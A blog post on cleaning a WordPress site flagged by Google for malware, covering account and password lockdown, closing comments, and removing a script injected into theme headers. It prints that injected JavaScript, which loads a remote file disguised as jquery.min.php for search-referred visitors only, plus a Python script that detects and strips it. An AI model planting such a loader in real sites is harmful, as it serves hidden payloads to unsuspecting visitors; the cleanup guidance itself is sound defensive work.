WordPress Malware – Cleaning Your Site

Well, I'm pissed enough that I have to write about this. Recently there has been a huge increase in WordPress sites that have been attacked with malware. Google's response has been to flag the site as malware, block it in search results, and put a warning page in front of it.

I have quite a few WordPress sites, of which GeekGumbo is one, and yes, I recently got blocked by Google because I had malware on my site, even though my WordPress software and plugins were up-to-date. This post goes through what I had to do to get rid of the malware, so if one of your sites is hit, this may help you.

Some general thoughts. First, these attacks may have been written by individuals, but the attack itself is carried out by bots, so even after you clean your site the bot will come back and try again; if you only remove the payload and don't close the hole it came in through, you will be cleaning it up again. Second, even though Google has blocked your site, Google is a friend that can help you get your site back online.

There are several sites on the web that will scan your site and clean it for a fee. Just Google "scan my web site for malware": they will scan your site, offer you additional information on what is infected, and ask for a fee to (hopefully) fix your problem. I personally don't trust these types of sites, because a site like that can easily take your money, drop another virus on your site, and ask for more money. But they can provide you with additional clues for cleaning out the malware, and it's worth using their scanner to see where they have found problems. A site that was helpful to me was Sucuri. They scanned my site and gave me helpful information to fix it.

If you don't want to pay them money, and you're like me, you want to go through the steps yourself to learn how your site is getting hacked, or you're not sure you trust someone else on your site, then read on for how to clean your site manually.

To clean your site, you will need access to your server's cPanel, your site's admin panel, and a utility like FileZilla to upload files to your server (use SFTP or FTPS rather than plain FTP; plain FTP sends your password in the clear, and a sniffed FTP password is one of the ways sites get re-infected). You'll need to edit files on your server in the public_html folder and work with the database on the server. And you'll have to make changes in your admin panel. I will walk you through the process, but if I just overwhelmed you, by all means go pay one of the malware fix-it sites to clean your site.

Ok let's get started.

1. Gather information about the malware. Go to the Google page that is linked from the warning page for your site (in Google Webmaster Tools, now called Search Console). Google will list files and possible infections. Scan your site with one of the scanner sites, and write down the clues to where the malware is on your site. Call up your host's technical support and ask them where the problem is. They can at least overwrite all your core WordPress files to eliminate any infection in areas outside the "wp-content" folder; if you do it yourself, compare against a fresh download of the same WordPress version and look for files that don't exist in the clean copy. Keep notes of whatever information you gather as you're going through the process, to refer to as you fix your problems.

Infections can come from files and folders uploaded to the site by someone who has cracked your site password or gained admin privileges, from existing files on your site that have been altered to carry the infection, or from spam content added to your site.

My disclaimer

I am not responsible if your site gets hosed by doing any of the below, or if anything bad happens to your site. You're doing this to your site, not me. You have total responsibility for your site. If you don't want to do something, don't do it. OK, let's go get 'em!

Step-by-step

Log into your site's admin panel. Google's block is a warning in search results and in browsers that use Google's Safe Browsing list; your server itself is still running. So type http://www.yoursite.com/wp-admin directly into the address bar (click through the browser warning if you get one) and log into your admin panel.

1. In the menu sidepanel, go to Users -> All Users. When the panel opens, at the top of the listing click on "Administrator." If you find any administrators that don't belong, mouse over the listing and delete it. Check the other roles too; an account you don't recognize with an odd e-mail address doesn't belong either, whatever its role.

2. Change your password, and make it a strong password. Under Users, go to your profile, and do the same for any other administrator accounts you have: edit the profile and scan down the page. At the bottom it says "New Password" with a button that says "Generate Password." Click the button and a field will populate with an obscure password. You can delete this long password and add your own. Be careful: if you use the generated password, you'd better write it down, or you won't be able to get into your site. After you type in the new password, and you're sure you know what it is, click "Update Profile." Also change your cPanel, FTP and database passwords at the same time, since whoever got in may hold those too, and replace the secret keys and salts in wp-config.php (the AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY and NONCE_KEY lines and their _SALT counterparts) with fresh values from https://api.wordpress.org/secret-key/1.1/salt/; that invalidates every login cookie that is already out there, including the attacker's.

Next we'll turn off comments.

3. In the admin panel, under comments, trash any comments you find that are spam.

4. Go to Settings -> Discussion and uncheck "Allow link notifications from other blogs (pingbacks and trackbacks) on new articles" and "Allow people to post comments on new articles." Make sure you save at the bottom. This only turns off comments on future posts you write, not on existing posts.

5. To turn off comments and pingbacks on old posts, go to your server's cPanel, bring up phpMyAdmin, go to your database, and click on the wp_posts table. Click on the "SQL" tab at the top menu. Use this query (if your site was installed with a table prefix other than the default wp_, use that prefix instead of wp_posts; the prefix is the $table_prefix line in wp-config.php):

UPDATE `wp_posts` SET comment_status = 'closed', ping_status= 'closed' WHERE post_status = 'publish'

This will close off any comments and pingbacks to all your existing published posts and pages.

Now that we have closed off comments, there is no reason for anyone to register on your site, so shut that down by going to Settings -> General; in the Membership section uncheck "Anyone can register," and save at the bottom of the page.

We've locked down your site, now let's clean your site.

In cPanel on your server, bring up the File Manager.

6. Go to the "public_html" folder and open the folder where your WordPress site is located. If your information search turned up a particular file with malware, look for that file and delete it.

With lots of caution, delete any folders that look suspicious. Most of your WordPress folders begin with "wp-"; if you're not sure a folder belongs on your site, do not delete it. You can usually spot bad folders: they may have porn titles or questionable content. Usually the bad folders will show up in the malware information you gathered in the first step.

JavaScript <script> viruses

Almost all of your problems will be in the wp-content folder. Two places outside it are still worth a look: .htaccess (for redirect rules you didn't write) and wp-config.php (for lines added after the closing PHP code). Inside wp-content, the uploads folder should contain images and documents only; any .php file in there is almost certainly a backdoor.

OK, we have a tough one to clean next. This is a JavaScript snippet that loads a remote script disguised as jQuery (note the file name jquery.min.php in the sample below) on top of your real jQuery. It adds to your pages, it does not overwrite your core jQuery file, so once you remove the snippet your real file is the only one loaded again. We have to clean it up in the File Manager on the server, not from the site's own pages.

The virus drops a script into your theme's "header.php" file, right before the closing "</head>" tag. When a visitor loads a page, the script writes a second <script> tag that pulls the remote file from another infected site. Two details of the sample below matter. The setTimeout(10) call is not a ten-second delay (setTimeout with no function to run does nothing useful); the script fires on page load. And it only writes the remote tag when document.referrer is non-empty, i.e. when the visitor arrived by clicking a link from another site, typically Google search results. If you type your own URL into the address bar there is no referrer, so the site owner never sees the payload while Google's crawler and visitors from search do. That is why a site can be flagged while it looks clean to you. On top of that, the same script turned up in the "header.php" of every theme in the themes folder, and in every theme of every other WordPress site on the same server. A script running in a visitor's browser cannot write files on your server, so that spreading was done by something with file access to your hosting account (a backdoor PHP file, or a stolen FTP/cPanel password), and that is what you have to find and close. It means that if you ever switch themes you're infected again, and now all your sites are infected and will be blocked by Google. Nasty, nasty, nasty!

Let's get rid of the JavaScript problem first, and then deal with an unsuspected repercussion on the Google side.

Open the File Manager in cPanel on your server. In your WordPress "wp-content" folder, go to the themes folder. One by one, go into each theme folder and edit the "header.php" file. Search for "</head>". Here's what the script looks like (the site it loads from is redacted):

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://[to some site that's infected]/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Delete the entire script, and make sure you scan all the way down to the end of the file in case it's in there more than once. The script may be in your header.php file several times. Do this in every theme's header.php file on all your WordPress sites. If you still have a clean copy of the theme (the original zip, or the version on wordpress.org), replacing the whole header.php from that copy is safer than hand editing, and diffing the two shows you anything else that was changed.
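Hand-editing every header.php across several sites is exactly the kind of job you will get wrong once, so here is a small script that does the search and the removal for you. This is an added example, not code from the original post: it assumes you can run Python on the server (or on a copy of the themes folder you downloaded), it matches the variant of the injected block quoted above (the fixed "var a=''; setTimeout(10);" prefix up to the first literal </script>, which works because the injected code never contains a literal "</script>" inside; it splits it as '<' + '/script>'), and the sample header it builds in demo() is constructed for the stand-alone run, with the loader host replaced by example.invalid. It also greps every file, not just header.php, for the jquery.min.php indicator, since the loader file name is the easiest thing to search for.

```python
"""Find and strip the injected jquery.min.php <script> block from WordPress theme headers.

Added example (not from the original post). Assumes the injected block starts with the
prefix seen in the post, "<script>var a=''; setTimeout(10);", and ends at the first
literal </script>; other variants need the regex below adjusted.
"""
import re
import tempfile
from pathlib import Path

# The injected code never contains a literal "</script>" inside the block (it writes it
# as '<' + '/script>'), so a non-greedy match ends at the right closing tag.
INJECTED_RE = re.compile(
    r"<script>var a='';\s*setTimeout\(10\);.*?jquery\.min\.php.*?</script>",
    re.DOTALL,
)
# Indicator worth grepping for in every file under the site, not only header.php.
INDICATOR = b"jquery.min.php"


def strip_injection(text):
    """Return (cleaned_text, number_of_injected_blocks_removed)."""
    return INJECTED_RE.subn("", text)


def find_indicator(root):
    """Relative paths of every file under root whose bytes contain the indicator."""
    root = Path(root)
    hits = []
    for path in root.rglob("*"):
        if path.is_file() and INDICATOR in path.read_bytes():
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def clean_headers(root, dry_run=True):
    """Strip the injected block from every header.php under root.

    Returns {relative_path: blocks_removed}. With dry_run=True nothing is written.
    With dry_run=False the original is kept as header.php.infected next to the cleaned
    file. Files are decoded as latin-1 so arbitrary bytes round-trip unchanged.
    """
    root = Path(root)
    removed = {}
    for header in root.rglob("header.php"):
        original = header.read_bytes().decode("latin-1")
        cleaned, count = strip_injection(original)
        if count:
            removed[header.relative_to(root).as_posix()] = count
            if not dry_run:
                header.with_name("header.php.infected").write_bytes(original.encode("latin-1"))
                header.write_bytes(cleaned.encode("latin-1"))
    return removed


# Constructed sample for the stand-alone run: the injected block with the loader host
# replaced by example.invalid, inserted twice before </head> in one of two themes.
INJECTED_SAMPLE = (
    "<script>var a=''; setTimeout(10); "
    "var default_keyword = encodeURIComponent(document.title); "
    "var se_referrer = encodeURIComponent(document.referrer); "
    "var base = \"http://example.invalid/js/jquery.min.php\"; "
    "var n_url = base + \"?default_keyword=\" + default_keyword + \"&se_referrer=\" + se_referrer; "
    "if (default_keyword !== '' && se_referrer !== ''){"
    "document.write('<script type=\"text/javascript\" src=\"' + n_url + '\">' + '<' + '/script>');}"
    "</script>"
)
CLEAN_HEADER = "<html>\n<head>\n<title>Site</title>\n<?php wp_head(); ?>\n</head>\n<body>\n"


def demo():
    """Build a throwaway themes tree, clean it for real, and report what happened."""
    root = Path(tempfile.mkdtemp(prefix="themes-"))
    bad = root / "twentyfourteen"
    good = root / "twentythirteen"
    bad.mkdir()
    good.mkdir()
    infected = CLEAN_HEADER.replace("</head>", INJECTED_SAMPLE + INJECTED_SAMPLE + "</head>")
    (bad / "header.php").write_text(infected, encoding="utf-8")
    (good / "header.php").write_text(CLEAN_HEADER, encoding="utf-8")
    before = find_indicator(root)
    removed = clean_headers(root, dry_run=False)
    restored = (bad / "header.php").read_text(encoding="utf-8") == CLEAN_HEADER
    return {
        "before": before,
        "removed": removed,
        "restored": restored,
        "backup_kept": (bad / "header.php.infected").exists(),
    }


if __name__ == "__main__":
    print(demo())
```

Run find_indicator() over the whole public_html first, and over every other site in the account, before running clean_headers() with dry_run=False; anything it flags outside a theme's header.php (a .php file in uploads, say) is the server-side foothold rather than the payload, and removing the payload alone won't keep it from coming back. Delete the .infected backups once you have confirmed the cleaned files work, otherwise the next scan will flag them again.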

Google Restoration

Go back to the Google malware page in Webmaster Tools. You may have had malware on all your sites, but unless Google knows that you're the owner of all of them, it will only re-check the sites it has verified you as the owner of, and turn those back on. If you have only one site of three registered and verified, it will only check the one, and the others will stay blocked. So go through the process of verifying all your WordPress sites by uploading the Google verification file to each site and then clicking "Verify." Once all your sites are verified in Google, request a review of each site. And presto, with a little delay, you're back up and running.

If this virus somehow gets back on your site after this, look at any other sites you have in the same hosting account that may be old, non-WordPress sites and not up to snuff security-wise. If you have not kept those sites up-to-date, the attackers may be getting to your backend through one of them, and everything under the same account shares the same file permissions.

This is only one virus we got rid of, admittedly the one going around right now. There will be others in the future, but at least you can see how to lock down and clean your site.